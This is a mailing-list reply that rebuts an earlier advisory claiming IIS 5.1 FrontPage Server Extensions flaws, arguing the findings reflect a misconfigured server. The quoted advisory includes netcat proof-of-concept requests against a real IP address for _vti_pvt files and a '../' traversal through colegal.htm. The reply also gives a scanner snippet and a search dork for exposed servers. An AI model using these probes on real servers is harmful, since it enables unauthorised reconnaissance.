I must clear up some issues on this advisory which is located at http://www.safehack.com/Advisory/IIS5webdir.txt as well as a previous advisory by the same author, NtWaK0, which is located at http://www.safehack.com/Advisory/shtmldump.txt Normally I wouldn't bother commenting on an advisory like this but when it comes to the FrontPage server extensions, vulnerabilities often get picked up by others without any verification. Perhaps this is because so few really understand much about FPSE security. In this commentary I am going to address the specific issues mentioned in the original advisory. My conclusions are based on my experience with FPSE security and actual testing on two separate Windows XP/IIS 5.1 installations as well as two Windows 2000/IIS 5.0 installations. I can provide specific documentation on my tests if anyone wishes to validate my research. The first issue to address is the claim that "_vti_bin/shtml.dll Can lead to REMOTE Exploit on IIS 5.1" In the advisory located at http://www.safehack.com/Advisory/shtmldump.txt, the author claims that by sending the request GET /_vti_bin/shtml.dll that binary data was returned which incidentally is the binary contents of the shtml.dll file. In other words, a GET request was made for shtml.dll and so the server sent the file shtml.dll back to the client. If this request had been made in a normal web browser, the Save As dialog box would have popped up, asking where to save shtml.dll. This situation would occur if the _vti_bin directory did not have execute permissions and did have read permissions, which is not the case with a default installation. The author seemed to imply that the previous malformed requests that were blocked by URLScan were the cause of the binary contents being returned, but did not state whether he had tried a successful GET request for shtml.dll before submitting those URL's. Nevertheless, even if the two malformed requests caused the binary contents of shtml.dll to be returned, that would by no means lead to a compromise of the system. Having the remote web site's shtml.dll is hardly going to lead to a compromise of a web server. This is NOT a vulnerability, but likely a misconfigured web server. This next three issues, addressed in the more recent advisory, are that certain files in the _vti_pvt directory will reveal information about the server. However, by default, anonymous users do not have read or write permissions to the _vti_pvt directory or its contents. Even if the permissions were manually changed to allow reading of this file, this is an old issue. Several years ago I had written a script for RFP's whisker scanner that was later integrated into the main scan.db. This script snippet is as follows: # These can be used to learn more about the server scan () _vti_pvt >> access.cnf info - Contains HTTP server-specific access control information scan () _vti_pvt >> service.cnf info - Contains meta-information about the web scan () _vti_pvt >> services.cnf info Contains the list of subwebs. scan () _vti_pvt >> writeto.cnf info Contains information about form handler result files scan () _vti_pvt >> svcacl.cnf info - File used to store whether subwebs have unique permissions settings info - and any IP address restrictions. Can be used to discover info - information about subwebs Default permissions were later tightened to prevent this information leak. This issue is NOT a vulnerability unless the admin explicitly gives anonymous users access to this file. By default, remote users do not have access to these files. Again, this is a misconfigured server. The final issue is that /iishelp/common/colegal.htm will give access to other files. The author states that the request GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf will return the contents of the access.cnf file. The flaw with this is that colegal.htm is a simply an html file with static content. There is some client-side javascript for browser support but no server-side code or server-side includes that would allow that file to access anything else on the system. In fact, the colegal.htm file is not even being accessed in that request. IIS will parse all of the ../'s which will take it to the web root (and ignore the extra ../'s) then down to the /_vti_pvt directory. If NtWaK0 had his friend look at his web logs he will see that there was never any request for colegal.htm. This is NOT a vulnerability. Even if it was vulnerable, since we know that a direct request to access.cnf on that misconfigured test server already returns the file contents, there is no proof that the colegal.htm request was successful. The proper way to test this is to request a file and get an access denied error then repeat the test with the exploit to show that the exploit worked. In the two advisories I tested, I found nothing that was an actual vulnerability. All of these issues were likely because the test server was not configured correctly. Furthermore, none of these issues are specific to IIS 5.1. Improperly configured FrontPage Server Extensions will exhibit this behaviour on any platform. Advisories such as this without any testing or confirmation by the vendor are what give security testers a bad name. The author says that Microsoft was notified but does not mention anything about getting any response from them. Where the author does not even have his own copy of IIS for testing, advisories such as these are better suited for vuln-dev. All of his tests were performed on a single XP system he did not install and therefore had not control over the configuration. Unverified vulnerabilities such as these make it difficult to sift through the ever-increasing amount of security information we are faced with every day. I do not mean to insult this author, I certainly commend him for his effort and creativity, but I do feel like this advisory was irresponsible. Even when I am absolutely sure of a security issue and have received confirmation from the vendor, I bounce my ideas off other security experts as a sanity check before sending anything out to the public. Hopefully NtWaK0 and others will also do so in the future. One final note is that the author mentions that a search for "writeto.cnf" at google.com will return many results. This statement is true. While not a vulnerability in the FrontPage Server Extensions, it is a good indication of how many FrontPage webs are not properly secured. However, keep in mind that many of those sites are running old versions of FPSE and many of those directory listings are sites that have FPSE disabled but the files were never removed from the site. Another more refined search for these servers is to search for "Index of /_vti_pvt/" (be sure to include the quotes in the search). sozni www.xato.net On Sun, 10 Feb 2002 21:29:36 -0500, Adonis.No.Spam wrote: >------BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > > .---------------. > / NtWaK0 Advisory \ + >-------------------------------------------------------------------- >------- >.. > >: Affected : Windows XP with IIS 5.1 : Type : >MULTIPLE Remote Issues : Type : Remote/ Local Security >Issues : Date : 10-02-2002 : Author : NtWaK0 @ >www.SafeHack.com : Credit : NtWaK0 @ www.SafeHack.com : + >-------------------------------------------------------------------- >------- >.. > >+--------------------. > Remote/Local Expoit \ +----------------------` >--------------------------------------------- >------- >.. > >: +-----------. * * * >www.SafeHack.com * * * : Disclaimer \ : +-------------` >------------------------------------------------------ >------- >.. > >: This material is presented for informational and entertainment >purposes : only, and to satisfy the curious. Any activities >described in this file : which involve vandalism, theft, or any >other illegal activities are : recounted from third-party >conversations. I do not condone or encourage : vandalism or theft. I >do not accept any liability for anything anyone : does with this >information. So, don't shoot the messenger. >: Remember: Use a computer in ways that ensure respect for your >fellows. >: > >: +-------. >: T.O.C. \ : +---------` >---------------------------------------------------------- >------- >.. > >: > >: [ Brief History . . . . . . . . . . . . . . . . . . . . . >.line 40 ] >: > >: [ The Problem . . . . . . . . . . . . . . . . . . . . . . >.line 60 ] >: > >: [ The Solution . . . . . . . . . . . . . . . . . . . . . .line >156 ] >: > >: +-------------. >: Brief History \ : +---------------` >---------------------------------------------------- >------- >.. >I had the chance to play for couple of hours with IIS 5.1 on a >friend Box, : thanks to Recon. While I was trying some stuff on IIS >5.1 I MANY problems : with default IIS 5.1 installation and on files >installed by default. >: > >: This one is not the same as the one reported earlier. The one >reported : before had to deal with "GET /_vti_bin/shtml.dll". >: A copy of it can be found at : : >http://www.safehack.com/Advisory/shtmldump.txt : > >: +-------+ : Test OS : +-------+ : Tested on Windows XP with IIS >5.1 : > >: > >: Please continue to read for more details. >: > >: +-----------. >: The Problem \ : +-------------` >------------------------------------------------------ >------- >.. > >: >>>> 1- Issue <<< >: > >: Identify WEB DIR installation. By sending this "GET >/_vti_pvt/access.cnf" : you can identify the web installation. As we >all know this is a helpfull : peace of information if someone is >going to attack your web site. >: > >: >>>> Proof-Of-Concept <<< >: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 >(?) open : GET /_vti_pvt/access.cnf : vti_encoding:SR|utf8-nl : >RealmName:LAMER : InheritPermissions:false : >PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt : > >: Their is another security issue with this too. >"InheritPermissions:false" : This will tell security inheritance of >that folder. >: > >: >>>> 2- Issue <<< >: >>>> Proof-Of-Concept <<< >: > >: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 >(?) open : GET /_vti_pvt/botinfs.cnf : > >: vti_encoding:SR|utf8-nl : D\:\\Program Files\\Common >Files\\Microsoft Shared\\Web Server Extensions\\ : >40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar : > >: >>>> 3- Issue <<< >: > >: >>>> Proof-Of-Concept <<< >: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 >(?) open : GET /_vti_pvt/bots.cnf : vti_encoding:SR|utf8-nl : >vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ >Shared : \\\\Web\\ Server\\ >Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf : vinavbar E I >info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft : \\ >Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar : >\\\\fp4Avnb.dll : > >: >>>> 4- Issue <<< >: Using GET /iishelp/common/colegal.htm you can access other files. >under the : web structure. I did not have chance to test it on file >above the : web structure. Like I said I do not run IIS 5.1 but a >friend does. >: One of these days I am going to buy more memory for some of my >old box and : slap on it IIS 5.1 to be able to do better test. >: > >: >>>> Proof-Of-Concept <<< >: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 >(?) open : GET >/iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf : >vti_encoding:SR|utf8-nl : RealmName:LAMER : InheritPermissions:false >: PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt : > >: writeto.cnf [Extracted From] >: >http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/ >: prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp : > >: Back links for files that can be written to by users of the web, >such as : Save Results Form handler result files. Files that can be >written to by : users of the web have a looser security setting than >regular web content. >: > >: > >: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 >(?) open : GET >/iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dl >l : MZÉ ? ? + @a ??¦? ¦ -!+?L-!This program cannot be run in >DOS mode. >: $ §- > >Q+Q¦?ïQ¦?ïQ¦?ï3¼,ïU¦?寮5ïT¦?ïQ¦>ïF¦?ïT¦9ïP¦?寮4ïS¦?寮;ïU¦?ïRichQ¦? >ï : PE L?? _; a ?!??? ? 0 c? ? µg ? ? ? > ? >: P ? ¿- ? ? ? ? ? ? ? » (? P 0 >P? >: > >: > >: > >: C:\Tool>nc -v -n 67.82.156.211 81 : (UNKNOWN) [67.82.156.211] 81 >(?) open : GET /_vti_pvt/linkinfo.cnf : vti_encoding:SR|utf8-nl : >javascript\:loadhelpfront();:localstart.asp : >javascript\:activate(<%=iver%>);:localstart.asp : >http\://www.safehack.com:index.htm : >/iishelp/common/colegal.htm:localstart.asp : > >: > >: > >: NOTE: A search on google for "writeto.cnf" Returned alarmed >results : >http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&m >eta= : > >: > >: +------------. >: The Solution \ : +--------------` >----------------------------------------------------- >------- >.. >No idea. Vendor was informed. >: If you are going to use the founded issues, credit must be given >to the : author. NtWaK0 @ www.safehack.com : + >-------------------------------------------------------------------- >------- >.. > >-----BEGIN PGP SIGNATURE----- >Version: PGP 7.1 > >iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV >w0aAHeJqCi7MoCs62m5AR8dm =u7kB -----END PGP SIGNATURE----- > > >_____________________________________________________________________ >___ The only secure computer is one that's unplugged, locked in a >safe, and buried 20 feet under the ground in a secret location... >and i'm not even too sure about that one"--Dennis Huges, FBI. > >____________________________________________________________.________ >___ Live Well Do Good www.SafeHack.com | Je >Pense, Donc Je Suis \(|)/ I know >I ain't perfect, but i'm 99 point 9 percent :) --(")-- >RFCs are meant to be read and followed…:) /`\ >NtWaK0 >_____________________________________________________________________ >___ Connect yourself to the main computer and let me take you to a >cybernetic ride. Are you connected to the right cybernet? If you >are, finally you are connected to my brain. > >_____________________________________________________________________ >___ -=- Use a computer in a ways that ensure respect for your fellow >-=- > >
